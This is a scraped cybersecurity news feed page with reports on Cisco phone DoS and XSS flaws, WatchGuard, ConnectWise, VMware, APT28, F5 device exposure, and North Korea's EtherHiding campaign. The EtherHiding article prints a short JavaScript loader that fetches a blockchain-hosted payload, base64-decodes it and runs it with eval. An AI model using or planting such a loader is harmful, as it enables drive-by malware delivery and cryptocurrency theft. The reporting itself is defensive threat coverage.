1010.cx

  • Cisco Desk, IP, and Video Phone Vulnerabilities Let Remote Attackers Trigger DoS And XSS Attacks

    ·

    , , ,

    Cisco has issued a security advisory warning of multiple vulnerabilities in its Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 models running Cisco Session Initiation Protocol (SIP) Software.

    Published on October 15, 2025, the advisory details risks that could enable unauthenticated remote attackers to trigger denial-of-service (DoS) conditions or cross-site scripting (XSS) attacks via the devices’ web user interface.

    These flaws affect phones registered to Cisco Unified Communications Manager (CUCM) with Web Access enabled, a feature disabled by default to minimize exposure.

    DoS Vulnerability Poses High Risk To Device Stability

    The primary concern is CVE-2025-20350, a high-severity buffer overflow flaw rated at a CVSS 3.1 score of 7.5. This vulnerability arises when affected devices process crafted HTTP packets, potentially causing the phone to reload and disrupt operations.

    Attackers need no privileges and can exploit it over the network with low complexity, leading to the temporary unavailability of communication services.

    Cisco links this to several bug IDs, including CSCwn51601, emphasizing its impact on enterprise telephony environments. A secondary issue, CVE-2025-20351, introduces a medium-severity XSS vulnerability with a CVSS score of 6.1.

    Due to inadequate input validation in the web UI, attackers can inject malicious scripts by tricking users into clicking crafted links.

    Successful exploitation could steal session data or manipulate the interface, though it requires user interaction. Associated bugs include CSCwn51683, highlighting persistent weaknesses in web handling.

    These vulnerabilities target specific Cisco SIP Software releases across the mentioned phone series, excluding those on Multiplatform Firmware, reads the advisory.

    Exploitation hinges on Web Access being active and CUCM registration, conditions not met in standard setups. No public exploits or malicious uses have been reported, but organizations with enabled web features face elevated risks in unified communications networks.

    Mitigations

    Cisco provides no direct workarounds beyond disabling Web Access through CUCM administration or the Bulk Administration Tool, which administrators can verify by checking the phone’s IP in a browser.

    Fixed releases include SIP Software 3.3(1) for Desk Phone 9800 and Video Phone 8875, 14.3(1)SR2 for IP Phone 7800/8800, and 11.0(6)SR7 for IP Phone 8821.

    Users should upgrade promptly to avert potential disruptions, as these patches fully address the flaws without impacting core functionality.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Cisco Desk, IP, and Video Phone Vulnerabilities Let Remote Attackers Trigger DoS And XSS Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Researchers Uncover WatchGuard VPN Bug That Could Let Attackers Take Over Devices

    ·

    Cybersecurity researchers have disclosed details of a recently patched critical security flaw in WatchGuard Fireware that could allow unauthenticated attackers to execute arbitrary code. The vulnerability, tracked as CVE-2025-9242 (CVSS score: 9.3), is described as an out-of-bounds write vulnerability affecting Fireware OS 11.10.2 up to and including 11.12.4_Update1, 12.0 up to and including

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Report Warns of AI-Powered Automation in Cyberattacks and Malware Creation

    ·

    , , , , ,

    Cybercriminals are weaponizing artificial intelligence to accelerate malware development, discover vulnerabilities faster, and create more sophisticated phishing campaigns, according to Microsoft’s latest Digital Defense Report covering trends from July 2024 through June 2025. In 80% of the cyber incidents Microsoft investigated last year, attackers sought to steal data primarily for profit rather than intelligence gathering. […]

    The post Microsoft Report Warns of AI-Powered Automation in Cyberattacks and Malware Creation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • ConnectWise Flaws Let Attackers Deliver Malicious Software Updates

    ·

    , , , ,

    ConnectWise has issued a critical security update for its Automate™ platform after uncovering vulnerabilities that could allow attackers to intercept and tamper with software updates. The flaws, present in on-premises installations configured to use unsecured communication channels, put organizations at risk of deploying malicious code under the guise of routine patches. ConnectWise Automate 2025.9, released […]

    The post ConnectWise Flaws Let Attackers Deliver Malicious Software Updates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Cisco Desk, IP, and Video Phones Vulnerable to Remote DoS and XSS Attacks

    ·

    , , ,

    Multiple Cisco desk, IP, and video phones are at risk of remote denial-of-service (DoS) and cross-site scripting (XSS) attacks due to flaws in their Session Initiation Protocol (SIP) software. The weaknesses affect Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 models when they are registered to Cisco Unified Communications […]

    The post Cisco Desk, IP, and Video Phones Vulnerable to Remote DoS and XSS Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • VMware Workstation and Fusion 25H2 Released with New Features and Latest OS Support

    ·

    ,

    VMware has launched Workstation 25H2 and Fusion 25H2, the newest iterations of its desktop hypervisors, featuring a revamped versioning system, enhanced tools, and broader compatibility with modern hardware and operating systems.

    These updates aim to streamline virtualization for developers, IT professionals, and testers by improving performance, automation, and support for cutting-edge platforms.

    The releases introduce a calendar-based naming convention, shifting from sequential numbers like 17.6.x or 13.6.x to 25H2, denoting the second half of 2025.

    This model simplifies release tracking, upgrade planning, and consistency across VMware’s product lineup, making it easier for users to stay current with updates.

    By aligning versions with time periods, VMware ensures clearer communication about publication dates and feature rollouts.

    Key Feature Enhancements

    Several new capabilities target automation and usability. The dictTool command-line utility now allows inspection and editing of .vmx configuration files and user preferences, fulfilling community requests for advanced scripting and customization options.

    USB 3.2 support accelerates data transfers and boosts compatibility with contemporary peripherals across both products. Hardware Version 22 enables virtual machines to leverage the latest virtual hardware for superior performance and feature access.

    Workstation exclusively adds Hyper-V/WHP detection, displaying the VM’s running mode for better troubleshooting on Windows hosts.

    Support for new CPUs and operating systems addresses the demands of evolving workloads. Workstation now accommodates Intel’s Lunar Lake, Arrow Lake, and Meteor Lake processors, enhancing host performance on recent hardware.

    Guest OS additions include Red Hat Enterprise Linux 10, Fedora Linux 42, openSUSE Leap 16.0 (RC), SUSE Linux 16 (Beta), Debian 13, Oracle Linux 10, VMware ESXi 9.0 (general for Workstation, Intel-only for Fusion), and macOS Tahoe (Intel-only for Fusion).

    Host OS expansions cover RHEL 10, Fedora 42, openSUSE Leap 16.0 (RC), SUSE Linux 16 (Beta), and Debian 13 for Workstation, while Fusion supports macOS Tahoe on both Intel and Apple Silicon systems.

    These updates ensure seamless virtualization of emerging technologies without compatibility hurdles.

    Bug Fixes And Security Improvements

    The 25H2 versions incorporate numerous refinements for stability and security. Security patches address vulnerabilities in both Workstation and Fusion, bolstering protection against potential threats.

    Accessibility improvements enhance interface navigation for diverse users. Workstation fixes include resolving Windows UI resizing issues, optimizing Linux support bundles, curbing excessive vmauthd logging in Event Viewer, adding VM suspend state discard options, and correcting Linux full-screen crashes, plus Intel GPU 3D acceleration problems.

    Fusion resolves dead key input glitches and ensures USB “Plug in Action” settings persist reliably. These changes tackle common pain points, improving overall reliability.

    Workstation Pro and Fusion Pro 25H2 launch in English, French, Japanese, and Spanish, broadening accessibility worldwide.

    Building on the free model introduced earlier, VMware expands its Customer FAQ at vmware.com/docs/desktop-hypervisor-faqs, covering community queries and direct feedback for quick resolutions.

    Downloads require registration via the official VMware site, with ongoing updates promised to maintain relevance. This release solidifies VMware’s commitment to robust desktop virtualization amid rapid tech advancements.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post VMware Workstation and Fusion 25H2 Released with New Features and Latest OS Support appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • APT28 Deploys BeardShell and Covenant Modules via Weaponized Office Documents

    ·

    , , ,

    Security researchers at Sekoia.io have uncovered a sophisticated cyberattack campaign orchestrated by APT28, the notorious Russian state-sponsored threat actor, targeting Ukrainian military personnel with weaponized Office documents that deliver advanced malware frameworks including BeardShell and Covenant modules. The operation represents a significant evolution in APT28’s tactics, leveraging legitimate cloud infrastructure and novel obfuscation techniques to […]

    The post APT28 Deploys BeardShell and Covenant Modules via Weaponized Office Documents appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency

    ·

    , ,

    In recent months, a sophisticated malware campaign—dubbed EtherHiding—has emerged from North Korea-aligned threat actors, sharply escalating the cybersecurity risks facing cryptocurrency exchanges and their users worldwide.

    The campaign surfaced in the wake of heightened regulatory crackdowns on illicit crypto transactions, with attackers shifting tactics to exploit new digital supply chain vulnerabilities.

    EtherHiding first appeared in targeted phishing campaigns, but has since evolved into a multi-stage threat, marked by its use of decentralized blockchain technologies to distribute and update malicious payloads stealthily.

    The signature tactic distinguishing EtherHiding lies in its exploitation of the Binance Smart Chain (BSC) to host intermediary scripts, thereby circumventing traditional security controls and enabling the campaign to persist even after domains or hosting providers are taken down.

    Attackers compromise legitimate or semi-legitimate websites, injecting code that reaches out to blockchain-stored content to fetch the latest stage of malware.

    This modular approach grants the operators a high degree of agility, allowing on-the-fly updates to malicious scripts and reducing the effectiveness of traditional blocklists or take-down requests.

    Google Cloud researchers identified and documented EtherHiding’s operation, highlighting its innovative use of cryptographic anonymity provided by blockchain networks, making forensic tracking and operational disruption significantly more challenging for defenders.

    The impact of EtherHiding has been severe, enabling not only the theft of digital assets but also establishing persistent access to infected systems for further espionage or ransomware activity.

    As the campaign evolved, it began to target browser extensions, hot wallets, and even popular DeFi platforms, broadening the spectrum of potential victims.

    The campaign’s ability to iterate and redeploy new infection chains has frustrated enterprise defenders, with many legacy endpoint security solutions failing to keep pace with the dynamic delivery infrastructure leveraged by North Korean operators.

    UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source – Google Cloud)

    Cryptocurrency platforms are under renewed pressure to audit their web and cloud assets, as even a minor misconfiguration can open pathways for EtherHiding’s injection and subsequent exploitation.

    Infection Mechanism and JavaScript Payloads

    The infection chain typically begins with JavaScript injected into vulnerable web properties. This script silently loads additional code from the Binance Smart Chain using unique transaction identifiers.

    The payload mechanism relies on obfuscation and multi-layer encoding, making static detection increasingly difficult.

    For instance, base64-encoded loader scripts are fetched and then executed within the browser context, occasionally using iframes or manipulated event handlers to deliver the next stage payload.

    A representative code snippet demonstrates the loader’s logic:-

    fetch('https://bsc-dataseed.binance.org/')
  .then(response => response.json())
  .then(data => {
    let scriptContent = atob(data.result);
    eval(scriptContent);
  });

    Such tactics not only obscure the origin of the malicious payload but also enable rapid code updates.

    As detection mechanisms adapt, EtherHiding operators push new payloads to the blockchain, decoupling the infection infrastructure from easy takedown and providing a resilient attack platform for ongoing theft and intrusion operations.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post North Korean Hackers Using EtherHiding to Deliver Malware and Steal Cryptocurrency appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over 269,000 F5 Devices Exposed Online After Major Breach: U.S. Faces Largest Risk

    ·

    , ,

    Over 269,000 F5 devices are reportedly exposed to the public internet daily, according to data from The Shadowserver Foundation.

    This exposure comes at a critical time following F5’s disclosure of a sophisticated nation-state attack that compromised its development environment, stealing source code and details on undisclosed vulnerabilities in BIG-IP products.

    Nearly half of these exposed IPs, around 134,000, are located in the United States, raising alarms for organizations worldwide relying on F5’s application delivery controllers for secure network operations.

    The breach, detected in August 2024 but involving long-term unauthorized access, underscores the vulnerabilities in F5’s infrastructure that could now amplify risks for exposed devices.

    Cybersecurity experts warn that the stolen information may enable attackers to craft targeted exploits, potentially leading to remote code execution or data exfiltration on unpatched systems.

    As federal agencies like CISA issue emergency directives, the sheer volume of internet-facing F5 hardware amplifies the threat landscape for enterprises in finance, government, and critical infrastructure sectors.

    F5 Networks confirmed on October 15, 2025, that advanced persistent threat actors had infiltrated its BIG-IP development systems, exfiltrating proprietary source code and vulnerability data not yet publicly disclosed or patched.

    This incident, described by F5 as involving “highly sophisticated” nation-state hackers, targeted engineering platforms and could compromise the integrity of future product releases.

    No direct evidence points to customer networks being breached yet, but the access to undisclosed flaws, potentially zero-days, heightens the urgency for immediate inventorying and updating of all BIG-IP instances.

    CISA’s Emergency Directive 26-01 mandates federal agencies to harden public-facing F5 devices and remove unsupported hardware, signaling the breach’s national security implications.

    The compromise affects products like BIG-IP iSeries, rSeries, F5OS-A, and BIG-IQ, with recent quarterly patches addressing related CVEs such as CVE-2025-61955 and CVE-2025-60013.

    F5 Devices Exposed Online

    Security firms like Sophos and Tenable emphasize monitoring for exploitation attempts, noting the potential for credential theft and lateral movement in affected environments.

    The Shadowserver Foundation’s Device Identification Report highlights the scale of the problem, scanning and identifying approximately 269,000 F5 device IPs daily accessible from the internet, with device_vendor filtered to F5.

    This data, shared via public reports, reveals a geographical concentration: the US dominates with 134,000 exposures, followed by countries like Japan, China, Germany, and the UK.

    Such visibility makes these devices prime targets for scanning and exploitation, especially post-breach when attackers may leverage stolen insights for precision strikes.

    Experts from organizations like Eclypsium stress that exposed iControl REST APIs, a common misconfiguration in F5 setups, have historically led to unauthenticated access vulnerabilities.

    With the recent theft of flaw details, unpatched or internet-facing BIG-IP systems face elevated risks of denial-of-service, buffer overflows, or full system takeover.

    Organizations must act swiftly by applying F5’s October 2025 security notifications, which include fixes for multiple modules in BIG-IP and F5OS platforms.

    The Shadowserver report provides daily IP feeds for proactive scanning, urging users to cross-reference with internal logs for indicators of compromise.

    As the F5 incident unfolds, this mass exposure serves as a clarion call for robust network segmentation and regular vulnerability assessments.

    With nation-state actors in play, the cybersecurity community anticipates increased exploit activity, making device visibility and rapid patching non-negotiable for global defenders.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Over 269,000 F5 Devices Exposed Online After Major Breach: U.S. Faces Largest Risk appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Over 269,000 F5 Devices Found Exposed Online After Massive Breach

    ·

    , ,

    A recent breach of F5 Networks’ infrastructure has left more than 269,000 devices exposed and vulnerable to attack. Security researchers first detected unusual activity on F5’s management portal, prompting the company to issue an alert and patch critical vulnerabilities. However, despite swift action, a daily snapshot from Shadowserver shows that nearly 269,000 unique IP addresses […]

    The post Over 269,000 F5 Devices Found Exposed Online After Massive Breach appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶